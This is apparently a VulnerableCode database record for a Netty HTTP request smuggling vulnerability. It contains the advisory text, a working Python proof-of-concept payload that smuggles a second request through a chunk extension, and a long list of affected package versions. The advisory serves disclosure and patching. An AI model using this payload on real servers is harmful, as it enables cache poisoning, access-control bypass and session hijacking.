{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/23656?format=json","vulnerability_id":"VCID-9syp-fkzy-4fhy","summary":"Netty: HTTP Request Smuggling via Chunked Extension Quoted-String Parsing\n## Summary\n\nNetty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks.\n\n## Background\n\nThis vulnerability is a new variant discovered during research into the \"Funky Chunks\" HTTP request smuggling techniques:\n\n- <https://w4ke.info/2025/06/18/funky-chunks.html>\n- <https://w4ke.info/2025/10/29/funky-chunks-2.html>\n\nThe original research tested various chunk extension parsing differentials but did not cover quoted-string handling within extension values.\n\n## Technical Details\n\n**RFC 9110 Section 7.1.1** defines chunked transfer encoding:\n\n```\nchunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF\nchunk-ext = *( BWS \";\" BWS chunk-ext-name [ BWS \"=\" BWS chunk-ext-val ] )\nchunk-ext-val = token / quoted-string\n```\n\n**RFC 9110 Section 5.6.4** defines quoted-string:\n\n```\nquoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE\n```\n\nCritically, the allowed character ranges within a quoted-string are:\n\n```\nqdtext = HTAB / SP / %x21 / %x23-5B / %x5D-7E / obs-text\nquoted-pair = \"\\\" ( HTAB / SP / VCHAR / obs-text )\n```\n\nCR (`%x0D`) and LF (`%x0A`) bytes fall outside all of these ranges and are therefore **not permitted** inside chunk extensions—whether quoted or unquoted. A strictly compliant parser should reject any request containing CR or LF bytes before the actual line terminator within a chunk extension with a `400 Bad Request` response (as Squid does, for example).\n\n## Vulnerability\n\nNetty terminates chunk header parsing at `\\r\\n` inside quoted strings instead of rejecting the request as malformed. This creates a parsing differential between Netty and RFC-compliant parsers, which can be exploited for request smuggling.\n\n**Expected behavior (RFC-compliant):**\nA request containing CR/LF bytes within a chunk extension value should be rejected outright as invalid.\n\n**Actual behavior (Netty):**\n\n```\nChunk: 1;a=\"value\n            ^^^^^ parsing terminates here at \\r\\n (INCORRECT)\nBody: here\"... is treated as body or the beginning of a subsequent request\n```\n\nThe root cause is that Netty does not validate that CR/LF bytes are forbidden inside chunk extensions before the terminating CRLF. Rather than attempting to parse through quoted strings, the appropriate fix is to reject such requests entirely.\n\n## Proof of Concept\n\n```python\n#!/usr/bin/env python3\nimport socket\n\npayload = (\n    b\"POST / HTTP/1.1\\r\\n\"\n    b\"Host: localhost\\r\\n\"\n    b\"Transfer-Encoding: chunked\\r\\n\"\n    b\"\\r\\n\"\n    b'1;a=\"\\r\\n'\n    b\"X\\r\\n\"\n    b\"0\\r\\n\"\n    b\"\\r\\n\"\n    b\"GET /smuggled HTTP/1.1\\r\\n\"\n    b\"Host: localhost\\r\\n\"\n    b\"Content-Length: 11\\r\\n\"\n    b\"\\r\\n\"\n    b'\"\\r\\n'\n    b\"Y\\r\\n\"\n    b\"0\\r\\n\"\n    b\"\\r\\n\"\n)\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.settimeout(3)\nsock.connect((\"127.0.0.1\", 8080))\nsock.sendall(payload)\n\nresponse = b\"\"\nwhile True:\n    try:\n        chunk = sock.recv(4096)\n        if not chunk:\n            break\n        response += chunk\n    except socket.timeout:\n        break\n\nsock.close()\nprint(f\"Responses: {response.count(b'HTTP/')}\")\nprint(response.decode(errors=\"replace\"))\n```\n\n**Result:** The server returns two HTTP responses from a single TCP connection, confirming request smuggling.\n\n### Parsing Breakdown\n\n| Parser                | Request 1         | Request 2                          |\n|-----------------------|-------------------|------------------------------------|\n| Netty (vulnerable)    | POST / body=\"X\"  | GET /smuggled (SMUGGLED)           |\n| RFC-compliant parser  | 400 Bad Request   | (none — malformed request rejected)|\n\n## Impact\n\n- **Request Smuggling**: An attacker can inject arbitrary HTTP requests into a connection.\n- **Cache Poisoning**: Smuggled responses may poison shared caches.\n- **Access Control Bypass**: Smuggled requests can circumvent frontend security controls.\n- **Session Hijacking**: Smuggled requests may intercept responses intended for other users.\n\n## Reproduction\n\n1. Start the minimal proof-of-concept environment using the provided Docker configuration.\n2. Execute the proof-of-concept script included in the attached archive.\n\n## Suggested Fix\n\nThe parser should reject requests containing CR or LF bytes within chunk extensions rather than attempting to interpret them:\n\n```\n1. Read chunk-size.\n2. If ';' is encountered, begin parsing extensions:\n   a. For each byte before the terminating CRLF:\n      - If CR (%x0D) or LF (%x0A) is encountered outside the\n        final terminating CRLF, reject the request with 400 Bad Request.\n   b. If the extension value begins with DQUOTE, validate that all\n      enclosed bytes conform to the qdtext / quoted-pair grammar.\n3. Only treat CRLF as the chunk header terminator when it appears\n   outside any quoted-string context and contains no preceding\n   illegal bytes.\n```\n\n## Acknowledgments\n\nCredit to Ben Kallus for clarifying the RFC interpretation during discussion on the HAProxy mailing list.\n\n## Resources\n\n- [RFC 9110: HTTP Semantics (Sections 5.6.4, 7.1.1)](https://www.rfc-editor.org/rfc/rfc9110)\n- [Funky Chunks Research](https://w4ke.info/2025/06/18/funky-chunks.html)\n- [Funky Chunks 2 Research](https://w4ke.info/2025/10/29/funky-chunks-2.html)\n\n## Attachments\n\n![Vulnerability Diagram](https://github.com/user-attachments/assets/2faaa23e-693b-4efc-afb7-aae1d4101e7e)\n\n[java_netty.zip](https://github.com/user-attachments/files/24697955/java_netty.zip)","aliases":[{"alias":"CVE-2026-33870"},{"alias":"GHSA-pwqr-wmgm-9rr8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/66597?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.132.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rcj-a9zf-yfhb"},{"vulnerability":"VCID-fjsb-jkbh-7yf5"},{"vulnerability":"VCID-ga1d-p8wh-83dj"},{"vulnerability":"VCID-kkgx-1pny-pua1"},{"vulnerability":"VCID-m7wv-hqyx-rfbb"},{"vulnerability":"VCID-sr2f-fg9d-w7g6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.132.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/66603?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.10.Final","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.10.Final"}],"affected_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/193737?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.Alpha1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.Alpha1"},{"url":"http://public2.vulnerablecode.io/api/packages/193738?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.Alpha2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.Alpha2"},{"url":"http://public2.vulnerablecode.io/api/packages/193739?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.Alpha3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.Alpha3"},{"url":"http://public2.vulnerablecode.io/api/packages/193740?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.Alpha4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.Alpha4"},{"url":"http://public2.vulnerablecode.io/api/packages/193741?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.Alpha5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.Alpha5"},{"url":"http://public2.vulnerablecode.io/api/packages/193742?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.Alpha6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.Alpha6"},{"url":"http://public2.vulnerablecode.io/api/packages/193743?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.Alpha7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.Alpha7"},{"url":"http://public2.vulnerablecode.io/api/packages/193744?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.Alpha8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.Alpha8"},{"url":"http://public2.vulnerablecode.io/api/packages/193745?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.Beta1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.Beta1"},{"url":"http://public2.vulnerablecode.io/api/packages/193746?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.Beta2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.Beta2"},{"url":"http://public2.vulnerablecode.io/api/packages/193747?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.Beta3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.Beta3"},{"url":"http://public2.vulnerablecode.io/api/packages/193748?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.CR1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.CR1"},{"url":"http://public2.vulnerablecode.io/api/packages/193749?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.CR2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.CR2"},{"url":"http://public2.vulnerablecode.io/api/packages/193750?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.CR3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.CR3"},{"url":"http://public2.vulnerablecode.io/api/packages/193751?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.CR4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.CR4"},{"url":"http://public2.vulnerablecode.io/api/packages/193752?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.CR5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.CR5"},{"url":"http://public2.vulnerablecode.io/api/packages/193753?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.CR6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.CR6"},{"url":"http://public2.vulnerablecode.io/api/packages/193754?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.CR7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.CR7"},{"url":"http://public2.vulnerablecode.io/api/packages/193755?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.CR8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.CR8"},{"url":"http://public2.vulnerablecode.io/api/packages/193756?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.CR9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.CR9"},{"url":"http://public2.vulnerablecode.io/api/packages/193757?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.0.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.0.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193758?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.1.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.1.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193759?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.2.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.2.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193760?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.3.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.3.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193761?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.4.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.4.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193762?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.5.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.5.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193763?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.6.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.6.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193764?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.7.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.7.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193765?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.8.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.8.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193766?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.9.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.9.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193767?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.10.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.10.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193768?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.11.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.11.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193769?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.12.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.12.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193770?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.13.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnerability":"VCID-m9t3-3sxz-8faz"},{"vulnerability":"VCID-mba8-bg91-77ak"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"},{"vulnerability":"VCID-swu5-a9h5-ffex"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.0.13.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/193771?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.0.14.Beta1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3mgs-vrus-q3ag"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-e92u-331h-bkcb"},{"vulnera